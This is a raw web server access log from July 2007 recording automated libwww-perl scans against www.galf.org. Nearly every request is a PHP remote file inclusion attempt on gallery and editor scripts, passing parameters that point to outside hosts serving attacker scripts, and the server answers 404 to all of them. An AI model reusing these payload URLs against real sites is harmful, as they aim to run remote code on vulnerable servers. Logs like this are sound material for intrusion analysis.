202.43.35.235 - - [22/Jul/2007:20:53:06 -0700] "GET /index.php?inc=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.40.99.241 - - [22/Jul/2007:20:55:40 -0700] "GET /logs/access.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
150.185.222.15 - - [22/Jul/2007:20:55:41 -0700] "GET /logs/access.log//myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.19.190.150 - - [22/Jul/2007:20:56:22 -0700] "GET /logs/index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.40.99.241 - - [22/Jul/2007:20:56:23 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.40.99.241 - - [22/Jul/2007:20:56:23 -0700] "GET /modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.19.190.150 - - [22/Jul/2007:20:56:23 -0700] "GET /index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.19.190.150 - - [22/Jul/2007:20:56:28 -0700] "GET /logs/index.php?include=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.19.190.150 - - [22/Jul/2007:20:56:29 -0700] "GET /index.php?include=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.19.190.150 - - [22/Jul/2007:20:56:34 -0700] "GET /logs/index.php?open=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.19.190.150 - - [22/Jul/2007:20:56:34 -0700] "GET /index.php?open=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.40.99.241 - - [22/Jul/2007:20:56:45 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.40.99.241 - - [22/Jul/2007:20:56:45 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
150.161.5.235 - - [22/Jul/2007:20:56:53 -0700] "GET /logs/index.php?id=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
150.161.5.235 - - [22/Jul/2007:20:56:54 -0700] "GET /index.php?id=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
150.185.222.15 - - [22/Jul/2007:20:57:03 -0700] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
64.40.99.241 - - [22/Jul/2007:20:57:03 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
64.40.99.241 - - [22/Jul/2007:20:57:03 -0700] "GET /modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.40.99.241 - - [22/Jul/2007:20:58:28 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
64.40.99.241 - - [22/Jul/2007:20:58:29 -0700] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.19.190.150 - - [22/Jul/2007:20:58:36 -0700] "GET /logs//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
200.19.190.150 - - [22/Jul/2007:20:58:37 -0700] "GET //modules/coppermine/include/init.inc.php?CPG_M_DIR=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.40.99.241 - - [22/Jul/2007:21:00:28 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
64.40.99.241 - - [22/Jul/2007:21:00:28 -0700] "GET /modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
70.84.7.74 - - [22/Jul/2007:21:01:29 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
70.84.7.74 - - [22/Jul/2007:21:01:29 -0700] "GET /modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
70.84.7.74 - - [22/Jul/2007:21:01:52 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
70.84.7.74 - - [22/Jul/2007:21:01:53 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
64.40.99.241 - - [22/Jul/2007:21:06:43 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
64.40.99.241 - - [22/Jul/2007:21:06:43 -0700] "GET /modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
150.185.222.15 - - [22/Jul/2007:21:06:50 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
150.185.222.15 - - [22/Jul/2007:21:06:54 -0700] "GET /modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww